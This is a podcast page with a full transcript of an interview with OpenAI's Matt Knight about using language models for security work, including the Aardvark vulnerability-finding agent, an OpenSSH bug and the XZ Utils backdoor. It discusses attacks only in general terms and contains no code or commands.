The AI That Found A Bug In The World’s Most Audited Code

39 min

•Dec 10, 20256 months ago

Summary

Matt Knight, OpenAI's VP of Security Products and Research, discusses the evolution of AI-powered security tools from GPT-3's limitations to current capabilities. He details Aardvark, an AI agent that discovers zero-day vulnerabilities in code and generates patches, including finding memory corruption bugs in highly audited software like OpenSSH.

Trends

AI security tools moving from efficiency gains to enabling previously impossible tasksShift from human-driven vulnerability research to AI-automated discoveryDemocratization of advanced security capabilities for under-resourced organizationsContinuous automated security testing replacing point-in-time assessmentsAI agents providing security expertise to open source maintainersLanguage models enabling real-time threat intelligence analysis across languages

Topics

AI-powered security Zero-day vulnerability discovery Code security automation Open source security Threat intelligence Memory corruption bugs Security operations automation AI agents Cybersecurity talent shortage Nation-state cyber threats OpenSSH vulnerabilities XZ Utils backdoor Security log analysis Threat modeling

Companies

People

Full Transcript

The data set wasn't in English, it was in Russian. But it wasn't just in Russian, it was in like the Russian shorthand that these 20 year olds are using to coordinate. It would have taken a diverse analytic team of linguists, technical experts, you name it. I mean, who knows how long it would have taken to pour through that data. And you know, we just suddenly had this alien intelligence that could just do it all day. We found a memory corruption bug in OpenSSH, which is one of the most highly audited pieces of software out there. Anytime you're finding memory corruption in OpenSSH, that's super interesting. Think about the blast radius had that it into Linux distributions that backdoors like what, like half the Internet with language models and the tools that we can build on them. We actually have the ability to scale security intelligence to all the places that need it. Right. To give these developers a fighting chance. Open SSH is one of the most audited pieces of software on the planet. Security researchers have pored over it for decades. And OpenAI just built an AI that found a memory corruption bug in it. Matt Knight spent five years as OpenAI CISO. Now he leads Aardvark, an AI agent that hunts for vulnerabilities the way a human security researcher would. It reads code, writes tests and proposes patches. And it's finding bugs that humans missed. This conversation traces the arc from GPT3, which couldn't analyze a simple security log, to today's models that discover flaws in critical infrastructure. Matt and A16Z's Joel de la Garza discussed why defenders might finally be gaining the upper hand and what that means for the open sour source maintainers currently outgunning the nation state attackers. Matt, thank you so much for coming back. Really do appreciate you coming on the show. You've done a couple of these with us talking about AI and security. I talked to a few folks at OpenAI and several of them told me you had the most interesting job at OpenAI, which is saying quite a lot because I think everything that they've done so far has been pretty crazy. So I'd love to maybe just start off by hearing a little bit about you and kind of what you do and what your role is at OpenAI and go from there. Yeah, Joel, thanks. It's great to be back. Great to see you again. I think the last time I was here I was having a chat with Vijay and Jason and it's great to have the chance to reconnect. So I'm OpenAI's VP of Security Products and Research where I'm focused on applying AI to some of the hardest unsolved security challenges of our time. And the goal of the program is to create defensive advantage using AI. Prior to this, I was OpenAI's CISO and head of security. I was in that role for five years before moving into this new focus. And you are correct, it's a lot of fun. I get to work on some really like, incredibly important and interesting challenges with amazing people at a very important time. Awesome. And congratulations on getting rid of the CISO role. That's usually a reason to celebrate. I am so thankful and grateful for my five years in that role. I mean it's, it was the, you know, just, you know, I would have, before moving into this new role, I would have said that, you know, I would proud if that were my, if that were to have been my life's work. But I'm, you know, really, you know, I couldn't be more excited and engaged by, by some of the things that we're working on. I think we're going to. We had the opportunity to put a really big dent in some very important problems. Yeah, absolutely. And so I think we, I mean, I think we last chatted maybe two years ago and the discussion was really focused on two parts. The first is sort of securing AI and kind of how do we deploy that. And I think that's kind of a road we've gone down and we've made a lot of progress on. I think the one that's really interesting and the thing that you've been focusing on is sort of how do we use AI to do security. And so we've seen over the last three years. Right. I think we're at the three year anniversary of the ChatGPT moment we've seen. Can you believe that, by the way? For years I can't either. Yeah, I think it's one of those things where it's, if you lay in bed all day, your days drag by, but if you're busy every minute of the day it flies. And so it's just really flown by. Sure is. What's even more incredible is just that like we seem to have these like every two weeks there's some new breakthrough where it's like my measurement of how exciting tech is by how many late nights I spend playing with it. And like before ChatGPT it was probably once every six months. And then after ChatGPT it's once every three weeks. Right. And just the pace of really cool stuff. And so the cool stuff that's Happening now to kind of what you're working on is we're actually starting to see AI make a dent. It seems to make a dent in security and it seems like perhaps it's starting to with the more provable use cases like code security and then probably going to trickle through, but would love to maybe hear kind of like your take on how that's working. Yeah, I appreciate that. Maybe to frame my conviction in how AI is going to transform defense, I think it might be good to walk backward and start from the beginning. So I joined OpenAI in mid 2020. It was June 2020 and just to sort of to put a, to orient us in the AI sort of timeline, the frontier model of the era was GPT3. I joined right as we were launching GPT3 on the OpenAI API, which at the time was alpha or beta Research Preview. It was very experimental and I came in with all these grand aspirations of building an AI native security program. We have this incredible alien technology that can do amazing things with text and language. Boy, I can't wait to see how much I'm going to be able to automate with this Incredible Frontier model. GPT3. Spoiler alert. Nothing. The model just was not good enough for real security automation or operational tasks or things that would actually create impact for a security program. There are a number of reasons why it was very limited in context length compared to models that we have today. The token vocabulary wasn't well oriented for a lot of what we wanted to process with. And then it was just a model with limited world knowledge and horsepower wasn't able to really do that much for us. If you gave it multiple choice questions or trivia, it could occasionally fake its way. But if you gave it a series of log lines and asked it to review them and classify them, or a section of code and ask it to spot the bug, it couldn't do it. Or it would make something up. Yeah, or it would make something up. Good news for us though is that a lot has changed since 2020. We're here in 2025. The frontier model is GPT5. We've had many breakthroughs along the way. Whether it's the improvements to RLHF and instruction following that make the models more searable. Things more recently, like the reasoning paradigm, which we've seen contribute to a number of breakthroughs for us too, means that we have models that are really incredible. And there have been a few points along the way where for me and the team that really forced us to update the biggest ones came during GPT4 training. So again, to bring us back to the AI timeline, that was summer 2022, and GPT4 was a really incredible moment at OpenAI because it was a true all hands on deck push. We were embarking on training a model that had to 1 up GPTs 3 and 3.5, which were quite good and quite profound. And we had the hypothesis that the scaling laws that we're going to hold and that we'd be able to add more data, more compute, and make an even better model. So we had a lot to live up to. So everybody across the company, from research to our infrastructure teams, the security teams, everybody was all hands on deck working on this big effort to train this model. And it's not just one and done. Training a model takes time. So as the model is baking in the oven, we get these more and more form snapshots of it that we can start to test and sample, see what the final product is going to look like. So we on the security team, we got our hands on a snapshot of GPT4 when it was about halfway there. So it wasn't as good as it was going to be, but it was enough to start to get a feel for what this model was going to look like when it popped out of the oven. And we put it through some tests. And this is mostly us sort of, as you were saying late at night, playing with it and just kind of hooting. Yeah, just kind of just being. Just playing with it and making first contact with it. And there were two tests that we ran that really kind of wowed us in the moment. The first was we took some of our security logs and we ran them through the model prompted. Pretend you're an expert security analyst reviewing these logs and determine, summarize the behavior and determine if what you see merits escalating to a human for further review. Typical tier one, level one triage. Exactly. That sort of workflow. Yeah, it's the sort of thing that every security team does. Right. Probably thousands of times a day, you would hope. But then there's the question of, you know, how much logs can you look at? Like, how good are your people at it? And the log source that we looked at were interactive SSH logs. So imagine like your bash history or, you know, commands, command line level logging that you would get from an employee, like, you know, either running commands in their terminal on their laptop or like sshing into a server and doing SRE is doing prod stuff or something. Exactly. You know, you could argue that having a human Review that data, you know, wouldn't just be ineffective, it would be like cruel and unusual or potentially a war crime. Yeah, yeah, you know, just review all this benign stuff and find the needle in the haystack. And oh, by the way, your job and the security of the company depends on it. Right? Like, honestly. Right. And not to distract a bit, but that's always been a challenge with security teams, which is that you hire these incredibly expensive, really talented, super skilled people, like a reverse malware binary engineer from the NSA that's done it for 10 years and then you have them go look at SSH logs, but it's in the details and that's what matters. Totally. Yeah, yeah. But so back to this anecdote, right? So we get these log sources, these really kind of, you know, pedantic just, you know, rote sources, run it through this prompt and the model just kind of got it right. You give it an example that had just a benign example of somebody configuring a web server or doing normal tasks and it says, hey, this is fine, no escalation needed. Since we're here are some tips to maybe make it more secure. Interesting value add there. But then you take those same payloads and you start to, you know, turn up the heat a bit. You know, you, you maybe touch secrets that are there. You, you know, sort of in the limit, you know, open a reverse shell or something like that. And the model said that right there, you know, you should have somebody look at that. And this was again, just to bring us back to the framing. This was a early version of GPT4. I just have to like, I'd love to maybe just kind of understand. I think I know the answer, but maybe from you to understand sort of the root cause of like how it's spotting things like reverse shells being bad, is that because there's so many like incident like descriptions that are in the training data set and that it's kind of trained on that behavior or I guess what do you think? What do you infer is kind of driving that analysis? You know, if we had one of our researchers here, I think they'd be able to think very deeply about this and give you a more scientific reason. Part of it is the world knowledge, part of it is the training, at least in that era. And you know, with things like the reasoning paradigm, we've really been able to push it even further in terms of what models can do and deduce about this behavior. We can have more on that later. So that was like the first example that really blew us away. This was just impossible with GPT 3 or 3.5. It was a totally new capability for us. The second that I want to just briefly talk about from that era too was we had this threat intelligence data set that we gotten our hands on. There was this cybercriminal group that had imploded earlier that year and as part of it, their internal chat logs wound up online. So it was this group, when they kind of dissolved, this interesting Data set of 60 something thousand messages back and forth of these cybercriminals plotting and doing crimes and stuff winds up online. Yeah, and they always have great opsec. And so there's totally nothing identifying in those chat logs. Right, well, so we got this data set, right? And I think we used LangChain to be able to do the context stuffing, manage all that. But we ran that through again, GPT4 and started asking questions of it. You know, who are these guys? What targets are they going after? If we want to defend against these groups, what types of indicators or tradecraft should we look out for? And it led us right to it. It told us that they were going after primarily civilian soft targets and things like that. They were going after some transportation companies. We saw some interesting results from that. They had either oday or some sort of, some sort of access through a security appliance that they were using to get in. And we were also seeing, you know, based on their like back and forth, that these actors were largely being successful at or that the companies that were being targeted were largely successful at, you know, finding them and kicking them out. You can see this because we can see them kind of getting in and then, oh no, we lost actors getting mad. What makes this, this is interesting? I think for a couple of reasons. But what really, I think seals the deal is the data set wasn't in English, it was in Russian. Oh yeah, but it wasn't just in Russian. It was in like the Russian shorthand that These, you know, 20 year olds are using to coordinate. And it would have taken a diverse analytic team of linguists, technical experts, you name it. I mean, who knows how long it would have taken to pour through that data. And we just suddenly had this alien intelligence that could just do it all day, which was great. So I mean, that really changed the game for us. We really started to look for opportunities to bring language models into the program. The things that we had the most success with were frankly pretty operational, automating parts of, you know, the apparatus that it takes to run, to run a security team. So These are things that aren't even that technical, but, you know, you need enough technical sort of horsepower to succeed with. They kind of started with that like sort of in the operational space. Yeah. And largely it was still very much human in the loop. Oh, entirely. It was augmenting existing stats basically. Entirely. And I think one of the things that has evolved for me, in my understanding has been when we had GPT4, we had a tool to largely help us with efficiencies. Right. There were things that could help us help our teams be more effective, help them cover more ground, help remove some of the toil in their work. One example that is, I think, frankly trivial, but it's also why I love it, is we built this bot like a slack bot that you could use to gather information from employees if you're investigating something. Oh yeah. Rather than, you know, you're. As you. You said your, you know, your highly skilled security engineer having to, you know, hello, colleague, my name is so and so, talk to a market person, right. Like, oh, here's gonna be a problem. But then do that across all their caseload. Right. Be able to just have a bot go and get that information and bring them back and then have them kind of review it and, you know, make whatever decision is needed, you know, that is that, you know, that helps that engineer be more effective. It also removes a lot of toil from their work of having to kind of do all this juggling. So I started first thinking about this as really like an efficiency opportunity. But what we've seen with the progress of what we see with more with modern models, with breakthroughs like the reasoning paradigm, with what they've been able to do, is that they're now enabling us to do things that were just previously impossible. And that largely informs what we're working on with Aardvark and some of the work within our program. Yeah. So maybe let's talk about that. Right. Because I think the current state of the art. I haven't yet played with Aardvark, so I couldn't tell you if you can hook us up. We'd love to take a look, but I might know a guy. There you go. Yeah, let's get that set up after this. The. The. It seems the order in which problems. In the order in which AI is solving problems maps pretty clearly to things that can be machine verifiable. And so it feels like a lot of the security problems that folks have been trying to throw AI at are just not machine verifiable. But code and security is and so maybe hearing a little bit about, well, first of all, what is Aardvark? Probably getting the cart in front of the aardvark. So maybe what is aardvark? And kind of what's the approach? And starting off there. Yeah. So Aardvark is our agentic security researcher. It looks at code, it finds zero days in that code and then it patches those zero days. It generates the patches to fix them. Aardvark. And this is all using. This isn't using. It's not running external tools. Like you're not running like a static analysis, like a fuzzer. Right. You're doing this with the models that you've built internally. Aardvark takes a very language model forward approach to doing this. And in doing so, maybe a better way to describe how you do codegen or something. Well, I think maybe a better way to analogize it is it looks for bugs the same way that you or I might or an expert vulnerability researcher would. It does so by reading the code, by analyzing the code. It'll write and run tests. It'll actually try to stand up scaffolding and explore it. It really experiments, explores and attacks the problem the same way that a human might. And if you look at some of the conventional methods for doing vulnerability discovery, to your comment on things being machine verifiable, they were largely human driven tasks. You have vulnerability researchers who will pour over source code, who will reverse engineer binaries, they'll run fuzzers that will generate thousands or tens of thousands or hundreds of thousands of crashes that they then need to review and sort of map back to the conditions that cause them. What we're seeing with Aardvark is that the language model is able to explore in the same way that a human might to do that. And then you combine that with the ability to generate and execute code and to test these hypotheses and you wind up with, I believe, a very compelling capability. So the Aardvark workflow is actually very simple. You hook Aardvark up to a code base and the first thing that it will do is it will generate a threat model. Just any good security engineer would. Right. It'll take a broad look at the code base, it will determine its assessment of the sort of security objectives, and then design an architecture of the code base. Essentially a planning phase, basically. Yeah, that's right. So it looks at that and it sort of builds its own model for what is this code base and what are the security properties of it. It then will look for vulnerabilities within the code base, using that sort of exploratory, very agentic way of looking for them. Once it finds a vulnerability, it will actually go a step further and will attempt to verify it. We call it validate within the product, where it will, within a secure sandbox, will run the code and will attempt to trigger the condition to verify that the vulnerability is in fact a truly correct vulnerability. And then at the output of that step, we obviously lean on our partners. We're doing this at OpenAI, right? So we have access to great tools like Codex, and we use Codex to generate a patch. And then we rescan the patch with Aardvark. Oh, nice. So that the happy path here is that by the time a human lays eyes on the finding, you have the finding and then you have the patch. It's all right there. You just read it and you click a button, you've got a patch. We started Aardvark initially as a research program within OpenAI. I got linked up with Dave Attell, who's a legend pioneer of a lot of application security. Dave's amazing. I got linked up with Dave about a year ago or so, and Dave was largely working on independent research applications of LLMs to security. And he came in and we started this really just as a research project of let's see what we can do here. And the results started coming. So we started scanning OpenAI's own code. In addition to helping to solve some security problems, we got feedback from our development teams that were quite interesting. We found that devs wanted more from it, not less, which is not something that as a CISO trying to protect is not something you can take for granted. And are you sliding all the way left into the dev's terminal? No, we're not today. So Aardvark still living CI cd, kind of. It's really for security engineers today. That's kind of where we're starting in part because that's where we think we're going to get the best feedback as we look to hone the capability. Devs don't want to fix security problems, they want to ship cool stuff. Right? But no, but what was really interesting about the feedback that we got was that developers found that it was explaining these bugs in ways that were helpful to help them understand. That makes a ton of sense though, right? The average security engineer has a heart is not typically at the level of a senior software developer. Right. But even if they are right, I mean, you think about, you know, you drop a ticket on somebody that Says, you know, this is vulnerable to CVE or 2020, whatever. And you read the Advisor and you're like, you know, what do I have to do about this? You know, Aardvark, you know, because it is contextual and the model can sort of, you know, understand the context and generate, you know, tailored responses, you know, can actually give feedback to the developer that sort of explains in context, you know, not only what the issues, but how to fix it. Yeah, totally. So they really like that they started, you know, asking for more findings from it. They, you know, they wanted us to bring, you know, their new hires in on it. They really incorporated it as part of their workflow, which to us we thought was a really powerful proof point that we were on the right track. So, you know, from there we moved on to scanning some open source projects that we thought were really important. I'm curious, kind of, what languages are you seeing this be the most effective with? You know, it's honestly, it's a mix. So, you know, we're expecting it to be, you know, good at system code. Right. That's where we started. You know, we do a lot of work in sort of, you know, modern languages of OpenAI, but we also have a lot of, you know, sort of memory unsafe code too. I think one of the things that was surprising to us was that Aardvark was performing sort of across like a broad spectrum of stacks. Yeah. So when we moved to open source, you know, we found, we found some memory corruption bugs in some very interesting, very highly audited targets. Think anything written in C that probably runs at the infrastructure level. That's right. I mean, we found a, that's the first place I looked. We found a, you know, a memory corruption bug in OpenSSH, which is one of the most highly audited pieces of software out there. Anytime you're finding, you know, memory corruption in OpenSSH, that's super interesting. Yeah. And you know, we reported that one got issued to CVE, you know, patched it all that the OpenSSH team's amazing. But so we started sort of broadening the aperture and looking at these open source projects and found that the capability was generalizing pretty well and that we were having success there too. And that's really what gave us the push to see what else we could do with this tool to start to sort of expand access, put it out there. I believe that there are a few things that are novel with it. The first is that it finds zero days. Right. It's not, you think about the sourcing of those types of issues. Conventionally it's from humans, as we said, it's a human vulnerability researcher finding a bug. It's a fuzzer that's generating crashes in humans. Sifting through them, things like that. Aardvark can actually find those novel issues. And the second is the connection with patching. The fact that we can use cogen, the G in GPT stands for generative. We can lean into that to generate the fixes and in doing so I think we can just transform the way that software is built and secured. One, the thesis we had, I think two years ago here looking at the, because you know, there's been, there have been a lot of waves of security AI using AI to solve security problems. Like we're probably in wave three or four right now, just in the last, since ChatGPT. And the thesis we typically, the thesis we had at the very start of this was, you know, things start to work when you start to see novel zero days found in highly audited source code bases. Right. And so first wave of this stuff was oh look, there's a bunch of cross site scripting errors that we find in these JavaScript, you know, these JavaScript based applications that are open source. And now hearing that we're getting to the point where we're finding memory corruption issues and core infrastructure code that's probably written in C and are particularly sharp edge like that. That just seems like it's starting to trigger that this stuff is actually working. Right. I think we've gone beyond sort of like the, we've overfit these things and it's just looking for patterns it found in previous CVEs and now we're doing that novel. Is that kind of what you're saying? I think that's a good assessment. That's right. That's fascinating. And so that covers, I think and I think it just makes total sense, right? As, as OpenAI and the other Frontier labs lean into CodeGen, as Cogen becomes a primary product that these folks are selling. This is a feature, right? The security that you generate needs to be, or the code that you generate needs to be secure. And so it makes total sense. One of the other areas, and this goes back to kind of the first use case you talked about where we've seen a lot of excitement, a lot of energy is around the idea that these AI agents will start replacing people. And this is I guess a continuation of maybe the MDR space or the AI SoC space. And I'm just curious, what has your experience been on that side of the equation, like, clearly, as we talked about, these things are very additive to tier one, level one analysts. Are we getting or approaching the point where they actually start replacing that labor or are we still very much in the augmenting phase? Oh, I think there is no line of sight to any impacts there. Like the cybersecurity talent shortage is frankly almost a meme at this point. I mean, we need tools to augment the people that we have because we just don't have enough people. Right. I mean, it's a exquisite skill that's required to be a security engineer. You have to be technical, you have to be operational. And it's a specialization within the specialization. We need as many people entering the cybersecurity workforce as possible and we need to equip them with the best tools for them to be the most effective. So I feel, you know, totally bullish on that. Yeah. That said, you know, as, as we were saying at the top, you know, there's a lot of like drudgery that goes into, you know, doing security work. It's the details, it's the late nights, it's, it's, it's coordination, it's business process. It's not all, it's not all, you know, you know, malware research and figure out this JSON blob, right. Threat intel and things like that. It's a lot of like business process too. Right. And you know, you know, maybe those. That gets some people out of bed in the morning, but you know, it's just part of the job. And you know, these are tools that are going to help teams be more effective, more efficient, solve problems that frankly need to be solved and hopefully in ways that are like more ergonomic and sustainable. Yeah, yeah. I mean, it's certainly, I think the most recent number I saw was the 3.5 million unfilled security jobs in the US I think was the number which one. I mean, I'm sure it's tatted, I'm sure it's inflated. It seems completely insane. I think just having tried to hire, having tried to hire people in this role in this field is always such a challenge that it just always feels like there is a massive shortage. But it seems like maybe 2026 is the year we start to break the hump. Right. Maybe these tools get us to a point where we don't need to, we not necessarily need less bodies, but we can do more with the bodies that we got. I think there's also something to be said for the on ramp. It can provide too, these Tools are incredibly useful for learning new concepts and exploring. You know, my pathway into security, you know, was through research and I was doing research on wireless systems and you know, these were like kind of hard, brainy topics. There was not a lot of, you know, public domain information about it and, you know, the ability to. I just think about how much that work would have been transformed with the tool like ChatGPT. I think there's a lot that can be said for that too. Yeah, 100%, I guess we've talked about. It's funny, the order of this discussion has been sort of like we started with the least sexy things first, right? Sort of like SecOps, then code. You know, the thing that people always talk about, the focus, the thing that always gets the most clicks and the thing that gets the most attention is always the hacking. It's always the offensive stuff. It's the offensive cyber penetration testing. All these sorts of things we've seen with some of the other labs and you guys have published as well, nation states using tools, all this kind of the usual what you would expect to see, right? If you've built a great product, of course nation states are going to use it. Also I'd like to point out that just seems like a really huge win for the American Frontier Labs, like sort of, that foreign adversaries are using our tech as opposed to their own domestic ones. So congratulations, we're still in the lead. One way to look at it, I guess, hey, look at that. They're not running deep SEQ models. So awesome. I guess the question would be like, it seems the nature of the attacker is that you have infinitely many shots on goal and you only need to be successful once. And so it makes sense that if I have this mechanical turk that can run infinitely, provided I have infinite money, I can get this thing to find a bug. Right. And so that it seems to be that there's an alignment there. But I'm curious from your perspective, right? We've seen a lot of automated pen testing companies, we've seen a lot of sort of more offensive cyber research people, threat modeling, et cetera. Does it seem like these models are better situated for doing the offensive work or are they going to be, Are they more situated for the blue team work? I'm just kind of curious your take on how this space is developing. So, you know, you say that if, you know, the attackers get to, you know, run all these mechanical terp shots on goal. So do we. Yeah. Well, now you do. Yes. That's what I think is really exciting here. So, well, I guess the difference is that you have to be 100% right on the blue team. Attackers can fail 99% but they get the 1. I think that's debatable. I'm sure you get some access, but then you know, anyway, you get booted out. Sure, yeah, yeah. I mean, cat and mouse, right. Really like the history of human conflict. Right. Is defined by this sort of evolution imbalance. And yeah, I think we don't have to bring AI into the equation to look at some of the, the security shortfalls that exist in the ecosystem. Right. Like the state of like modern software security is like quite uneven, some might even say bad. Yeah. And you know, the scale and complexity of it is just, it has reached such a state that, that we need tools like this, frankly. We need the ability to scale security expertise to all of the developers and organizations that need it. One of the reasons why, why I'm personally really motivated to work on Aardvark is to do something and give something back to the open source community and we should come back to that, but just to speak to the threats real quick. So, you know, we, we published a, or OpenAI publishes throughout reports. Right. We, we try to share what we're seeing. Right. So that other labs and stakeholders can, can learn from things. And I think you guys were the first lab to start putting stuff out there. We. And just to. To speak about that. So we published our first threat report. It's a joint effort with Microsoft's mystic, their threat intelligence team back in. I think it was early 2023 where we used some of the. We worked together and we were able to identify threat actors from China, Russia, Iran, North Korea, sort of learn what they were doing and then kick them off and get rid of them. And we found that they were experimenting but largely weren't being that successful. And since then we put out more threat reports that study and we've also built a team and a whole apparatus to do this at scale and be really good at this. And what we're seeing is that these adversaries are interested and they're motivated. My editorial though is that you look at what defenders are doing today and the balance of trade or where the value is accruing far in their favor. I think if you were to pull most CISOs, they would agree with that. Yeah, I mean, I think it's just the hiring. If you want to hire a red teamer or you want to hire a pen tester, you get hundreds of applicants, applications, but you want to hire like a really Good blue team engineer. You'll find like three. Right. I just think. I think there's just an attractiveness to that, to the offensive side that just sort of unbalances, makes the equation look more unbalanced than it is to your point. Like, I think that's why the value for these tools will more readily accrue to the blue team, because the blue team is consistently the one where I think you find the biggest labor shortage could be. I mean, you have to play offense to play good defense. Right. I mean, that's how you. But red team always wins. Right. That's always. It's sort of the easy side of the equation. The defense is the hard one. Yeah. But you do it again, that's what you get, I guess you get to do it more. Right. It's a. It's a program and a journey. Right. Yeah. Do you think we get to a point where we just have sort of. I know this is a bit of a loaded question. Do you think we get to a point where we just have like kind of continuous testing and continue? Because all the things we do in security are always shots in time. Right. It's okay. This was last week. Okay. This was this week. Do you think we. This actually gets us to a point where we can do this all the time? Well, that's what Aardvark is. Aardvark is sort of continuous and proactive. It's always on. It's auditing changes to your code in basically near real time. And one way of framing it is that It's a senior AppSec engineer who's always there just checking your work and it's going to tap you on the shoulder if there's a problem there. That's just one surface. We're just looking at code. Yeah. But, you know, you can think about how this could generalize to other parts of the enterprise and other places where it's needed. Maybe it's a. I want to go back to the open source topic because this is one that I. I'm very impassioned about and in believing that, you know, software is so complex, the open source community gives us so much. They are also under resourced. They're overworked and, you know, OpenAI has the privilege of being able to hire and staff a security team. But even some of the best resourced projects struggle to build security programs. And then you go further down. Frankly, the story of the year for me last year was the XE utils. Oh, yeah. It was incredible. And it wasn't none of the Tooling in the tool chain caught it. It was some overly obsessive principal level engineer that was frustrated about latency and keystrokes. Right. We got lucky as hell. If you're listening. Thank you. Yeah, totally. I'll buy you a beer. So just for, just for the benefits of, for the benefit of the listeners. So to maybe set the stage on this. So XE Utils is an open source, it's a library that implements the XE compression algorithm and was maintained by a solo developer. This library was used in a number of places, notably I think it was systemd, which is a component of Debian and other major Linux distributions. This developer, I think they got socially engineered, right, basically took on a maintainer who turned out not to be who they said they were and had the intents that they said that they were. They added a sort of stealthy and discreet backdoor right before a major release which made it into a pre release version of systemd, which is ultimately where it got caught. And just you know, think about the blast radius had that made it into Linux distributions like that, that backdoors like what, like half the Internet. Oh yeah, totally, probably. And you know that's the one that we found. Yeah, right. And you know, like what, you know there's been a lot of speculation as to who was behind the attack. But you know, what chance do these open source developers, these just like these heroic volunteers who are spending their time to contribute their knowledge and give back and deliver these building blocks that enable the industry to do so many amazing things. What chance do they have against the full force of a foreign intelligence service or a really determined criminal actor group who's going to seek to support them? And those package maintainers probably have 15 to 20 other packages they're maintaining. It's just, it's ridiculous. Yeah, we talk about this all the time. You look at the NPM issues that we've been having, yeah, it's creating a real problem. But you know we, with language models and the tools that we can build on them, we actually have the ability to scale security intelligence to all the places that need it. Right. To give these developers a fighting chance, the tools that they need to, to take, to really be empowered in security here. And you know, with Aardvark, we're hoping to do something really big around open source. We haven't exactly figured out what, but you know, we're in private beta now and we open call to open source maintainers. If you want to be on the beta, please reach out. We'd love to Hear from you. And we'd love to make Aardvark a tool that works very well for you. There you have it. Aardvark for open source maintainers. I think we'll get a big inbound from this one. Yeah, it's a topic I'm very impassioned about this. My journey into security. I mentioned I was doing wireless research. I started doing security research largely using open source hardware and software, you know, tools like the GNU Radio project and different open source SDRs and things like that, that I frankly have to thank that whole community for my career because who knows if I would have gotten to security without that. And there's just such amazing, talented and passionate people who just volunteer their time all day, every day. And I hope that Aardvark, I hope that with Aardvark, you know, the team and I are able to put our finger on the scale and deliver something that really helps these developers. Absolutely. Well, I mean, I think, and I think the dream is, right, it's sort of the security has always been kind of the rich person's game, right? Like it's the global banks, right? The big defense contractors that have unlimited budget, hire all the people, they buy all the cool toys. And it just seems like this is a wave where we're going to start to democratize some of this stuff. And it's. It'd be great if my local monpod dentist had the same security profile as my investment bank. Right. It just seems like that's a much better world where everyone can get access to this kind of stuff. I hope you're right. And I mean, you know, we look at, you know, sort of critical infrastructure writ large and there's a lot that we can do here. Yeah, yeah. It's the kind of thing where it was. It's funny, right, because I think this is very much a mid 2010s kind of attitude, which was like, we got to stop using security as a competitive advantage. It's sort of like a world in which we win because we don't get hacked is not a good world to live in. Especially when you start talking about things like nuclear power plants and airplanes. You know, just throwing back to the podcast we did with BJ and Jason a couple years ago, you know, those guys are great. And, you know, we, you know, no matter what, you know, gets reported on in terms of, you know, competition in the ecosystem, you know, we all were facing the same threats and challenges and, you know, we, you know, very sort of aligned and united in that, which is, I thought was a really sort of, you know, great and appreciated relationship. Absolutely. Well, thank you so much. This has been a wonderful conversation. Great to hear about all the progress and congratulations on having the coolest job at OpenAI. That's quite a title. Thanks Joel. A lot of fun. Great conversation. Thanks for having me. Thank you. Thanks for listening. If you enjoyed the episode, let us know by leaving a review@ratethispodcast.com a16z we've got more great conversations. See you next time. As a reminder, the content here is for informational purposes only, should not be taken as legal, business, tax or investment advice or be used to evaluate any investment or security, and is not directed at any investors or potential investors in any A16Z fund. Please note that A16Z and its affiliates may also maintain investments in the companies discussed in this podcast. For more details, including a link to our investments, please see a16z.com disclosures.